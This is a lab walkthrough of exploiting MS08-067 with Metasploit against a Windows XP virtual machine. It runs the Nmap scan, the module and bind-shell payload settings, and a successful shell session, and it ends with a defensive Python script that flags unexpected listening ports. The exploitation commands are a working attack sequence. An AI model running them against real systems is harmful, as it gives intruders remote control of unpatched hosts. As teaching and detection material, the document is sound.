Target IP address: 192.168.9.4, operating system Windows XP SP3 (Chinese edition)
Attacker IP address: 192.168.9.1
Check the database connection status
msf > db_status
[*] postgresql connected to msf3
Scan the target host with Nmap (SYN scan, version detection, OS detection, and the smb-check-vulns script)
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
Search for the ms08_067 module
msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date           Rank   Description
   ----                                 ---------------           ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC   great  Microsoft Server Service Relative Path Stack Corruption
Select the ms08_067 exploit module
msf > use exploit/windows/smb/ms08_067_netapi
Set the remote host address; the payload chosen below uses a forward (bind) connection, so the attacker connects to the target after exploitation
msf exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4
Set the payload (shellcode)
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
Show the module's configuration options
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.9.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.9.4      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
Run the exploit
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 中文版 (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800
The exploit succeeded and returned a command shell on the target
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            SUPPORT_388945a0
The command completed with one or more errors.
To find out which operating system versions a module supports, enter the info command after selecting the module; it prints the module's details, including the targets and a description of the vulnerability.
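As an added, defender-side example (not part of this write-up and not Metasploit or Nmap code), the following Python parses db_nmap output like the scan above into a per-host baseline of open ports and smb-check-vulns results, lists the hosts the script marks MS08-067 VULNERABLE so they can be patched, and then checks connection records against that baseline: the session line above shows the bind handler connecting to 192.168.9.4:4444, a port the scan did not report open, which is the pattern the last function flags. The scan text is re-typed from the output above; the connection-record format and the sample records are constructed for this example.

```python
"""Parse db_nmap output into a baseline and flag connections that fall outside it.
Added example, not from the original write-up. The SCAN_OUTPUT text is re-typed
from the scan shown above; CONNECTIONS and its "src:port -> dst:port" format are
constructed for this example."""
import re
from dataclasses import dataclass, field

# Constructed sample: the db_nmap lines from the write-up (abbreviated), with the "[*] Nmap:" prefix.
SCAN_OUTPUT = """\
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""

# Constructed connection records (assumed format "src:port -> dst:port"); the second one
# mirrors the bind-shell session line from the write-up.
CONNECTIONS = [
    "192.168.9.1:1120 -> 192.168.9.4:445",
    "192.168.9.1:1126 -> 192.168.9.4:4444",
    "192.168.9.7:52100 -> 192.168.9.4:139",
]


@dataclass
class HostFinding:
    ip: str
    open_ports: set = field(default_factory=set)   # TCP/UDP ports Nmap reported open
    os_details: str = ""
    vulns: dict = field(default_factory=dict)      # smb-check-vulns check name -> status text


def parse_db_nmap(text):
    """Return {ip: HostFinding} from db_nmap-style output."""
    hosts = {}
    current = None
    for raw in text.splitlines():
        line = re.sub(r"^\[\*\] Nmap:\s*", "", raw).strip()   # drop the msfconsole prefix
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            current = hosts.setdefault(m.group(1), HostFinding(m.group(1)))
            continue
        if current is None:
            continue
        m = re.match(r"(\d+)/(tcp|udp)\s+open\b", line)
        if m:
            current.open_ports.add(int(m.group(1)))
            continue
        m = re.match(r"OS details:\s*(.*)", line)
        if m:
            current.os_details = m.group(1)
            continue
        # Script result lines look like "|   MS08-067: VULNERABLE" or "|_  MS07-029: ...";
        # the "| smb-check-vulns:" header has nothing after the colon and is skipped.
        m = re.match(r"^\|_?\s+([\w-]+):\s*(.+)$", line)
        if m:
            current.vulns[m.group(1).upper()] = m.group(2).strip()
    return hosts


def vulnerable_hosts(hosts):
    """IPs whose smb-check-vulns result marks MS08-067 as VULNERABLE (patch these first)."""
    return sorted(ip for ip, h in hosts.items()
                  if h.vulns.get("MS08-067", "").upper().startswith("VULNERABLE"))


def flag_unexpected_listeners(hosts, connections):
    """Return (src_ip, dst_ip, dst_port) for connections to a scanned host on a port the
    baseline scan did not show open; a bind-shell payload creates exactly such a listener."""
    alerts = []
    for rec in connections:
        src, dst = [part.strip() for part in rec.split("->")]
        src_ip, _ = src.rsplit(":", 1)
        dst_ip, dst_port = dst.rsplit(":", 1)
        host = hosts.get(dst_ip)
        if host is not None and int(dst_port) not in host.open_ports:
            alerts.append((src_ip, dst_ip, int(dst_port)))
    return alerts


if __name__ == "__main__":
    baseline = parse_db_nmap(SCAN_OUTPUT)
    for ip, h in baseline.items():
        print(f"{ip}: open={sorted(h.open_ports)} os={h.os_details!r} checks={h.vulns}")
    print("MS08-067 vulnerable:", vulnerable_hosts(baseline))
    print("Connections outside baseline:", flag_unexpected_listeners(baseline, CONNECTIONS))
```

The baseline comparison is deliberately simple: it only asks whether a destination port was open at scan time, so a legitimate service started after the scan would also be flagged and the scan must be refreshed when hosts change. The value of the check is in its direction: an inbound connection to a port that was closed an hour ago, shortly after SMB traffic from the same source, is the exact footprint of the session line in this write-up.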